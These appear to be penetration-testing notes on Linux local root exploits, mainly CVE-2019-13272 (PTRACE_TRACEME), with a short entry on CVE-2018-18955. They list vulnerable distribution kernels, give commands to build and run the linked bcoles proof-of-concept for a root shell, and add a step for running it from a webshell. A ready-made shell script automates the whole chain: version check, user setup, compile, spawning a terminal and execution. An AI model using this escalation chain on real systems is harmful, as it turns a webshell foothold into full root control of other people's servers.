Affected versions (not exhaustively tested)
Linux 4.10 up to, but not including, 5.1.17: PTRACE_TRACEME local root (CVE-2019-13272)
According to the comments in the PoC source on GitHub, the author tested the following systems and the exploit succeeded on all of them.
- Ubuntu 16.04.5 kernel 4.15.0-29-generic
- Ubuntu 18.04.1 kernel 4.15.0-20-generic
- Ubuntu 19.04 kernel 5.0.0-15-generic
- Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
- Linux Mint 19 kernel 4.15.0-20-generic
- Xubuntu 16.04.4 kernel 4.13.0-36-generic
- ElementaryOS 0.4.1 kernel 4.8.0-52-generic
- Backbox 6 kernel 4.18.0-21-generic
- Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
- Kali kernel 4.19.0-kali5-amd64
- Redcore 1806 (LXQT) kernel 4.16.16-redcore
- MX 18.3 kernel 4.19.37-2~mx17+1
- RHEL 8.0 kernel 4.18.0-80.el8.x86_64
- Debian 9.4.0 kernel 4.9.0-6-amd64
- Debian 10.0.0 kernel 4.19.0-5-amd64
- Devuan 2.0.0 kernel 4.9.0-6-amd64
- SparkyLinux 5.8 kernel 4.19.0-5-amd64
- Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
- Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
- Mageia 6 kernel 4.9.35-desktop-1.mga6
- Antergos 18.7 kernel 4.17.6-1-ARCH

Note that the list includes 4.8 and 4.9 kernels, below the nominal 4.10 lower bound, so treat the version range only as a first filter: distribution kernels carry backported code and backported fixes without changing the version string, and the reliable test is the vendor advisory or the PoC itself.
First, as root, add a low-privileged test user to run the exploit as: useradd guest; echo 'guest:123456' | chpasswd
Then compile the PoC with gcc. Do this in /tmp, which the unprivileged user can write to; -o names the output file: gcc -s poc.c -o poc
The current user must also have a home directory under /home/.
Running the PoC then succeeds (root shell).
References: https://github.com/bcoles/kernel-exploits/blob/master/CVE-2019-13272/poc.c https://zhuanlan.zhihu.com/p/76231535
Doing it from a webshell
A webshell normally has no controlling terminal, so first spawn a shell with a pseudo-terminal:
python -c 'import pty;pty.spawn("/bin/sh")'
- Then run the exploit as above.
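The lab procedure above (test user, build in /tmp, PTY from a webshell, run), gathered into one POSIX shell script. This is an added example, not code from the original notes or from the bcoles repository. It assumes the PoC source has been copied to /tmp/poc.c, uses the user name and password from the notes, and treats the 4.10 <= v < 5.1.17 range as a first filter only, since distribution kernels backport both code and fixes; the python3 and util-linux `script` fallbacks for the PTY step are additions not mentioned on the page.

```shell
#!/bin/sh
# Added example (not the notes' or the bcoles repo's code).
# Assumptions: PoC source at /tmp/poc.c; lab user guest/123456 as in the notes.

# Return 0 if a `uname -r` string such as "4.15.0-29-generic" lies in
# [4.10, 5.1.17), the nominal CVE-2019-13272 range; 1 otherwise (including
# for anything that is not a plain x.y.z version, which we refuse to guess).
kernel_in_affected_range() {
    v=${1%%-*}                        # "4.18.0-80.el8.x86_64" -> "4.18.0"
    major=${v%%.*}
    rest=${v#"$major"}; rest=${rest#.}
    minor=${rest%%.*}
    rest=${rest#"$minor"}; rest=${rest#.}
    patch=${rest%%.*}
    [ -n "$minor" ] || minor=0        # "5" -> 5.0.0, "5.1" -> 5.1.0
    [ -n "$patch" ] || patch=0
    for x in "$major" "$minor" "$patch"; do
        case "$x" in ''|*[!0-9]*) return 1 ;; esac
    done
    key=$((major * 1000000 + minor * 1000 + patch))
    lo=$((4 * 1000000 + 10 * 1000))           # 4.10.0: bug introduced
    hi=$((5 * 1000000 + 1 * 1000 + 17))       # 5.1.17: first fixed release
    [ "$key" -ge "$lo" ] && [ "$key" -lt "$hi" ]
}

# Lab setup, run as root. -m creates /home/guest, which the notes say the
# PoC needs to exist for the current user.
create_lab_user() {
    useradd -m guest
    echo 'guest:123456' | chpasswd
}

# Build in /tmp, which the unprivileged user can write to; -s strips symbols.
build_poc() {
    cd /tmp && gcc -s poc.c -o poc
}

# From a webshell there is usually no controlling terminal; get one first.
# The notes use python; python3 and util-linux `script` are fallbacks added here.
spawn_pty() {
    if command -v python >/dev/null 2>&1; then
        exec python -c 'import pty;pty.spawn("/bin/sh")'
    elif command -v python3 >/dev/null 2>&1; then
        exec python3 -c 'import pty;pty.spawn("/bin/sh")'
    else
        exec script -qc /bin/sh /dev/null
    fi
}

# Dispatcher: with no argument the script defines the functions and exits,
# so it can be sourced without side effects.
case "${1:-}" in
    check)
        if kernel_in_affected_range "$(uname -r)"; then
            echo "kernel $(uname -r): in the nominal affected range, run the PoC to confirm"
        else
            echo "kernel $(uname -r): outside the nominal range (a backported bug may still apply)"
        fi ;;
    user)  create_lab_user ;;
    build) build_poc ;;
    pty)   spawn_pty ;;
    run)   exec /tmp/poc ;;
esac
```

Typical order as the guest user: `sh lab.sh check`, then `sh lab.sh build` and `sh lab.sh run`; from a webshell, `sh lab.sh pty` first. The version check deliberately returns "not affected" for strings it cannot parse rather than guessing.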
References: https://www.cnblogs.com/xdjun/p/7620531.html https://www.cnblogs.com/Rightsec/p/10370132.html
CVE-2018-18955
User namespace local root: map_write() in kernel/user_namespace.c mishandles nested user namespaces with more than 5 UID or GID ranges (Linux 4.15.x through 4.19.x before 4.19.2). The bcoles exploit below (subuid_shell.c) runs as an unprivileged user, so the host must allow unprivileged user namespaces for it to work.
References: https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-18955/subuid_shell.c https://www.freebuf.com/vuls/197122.html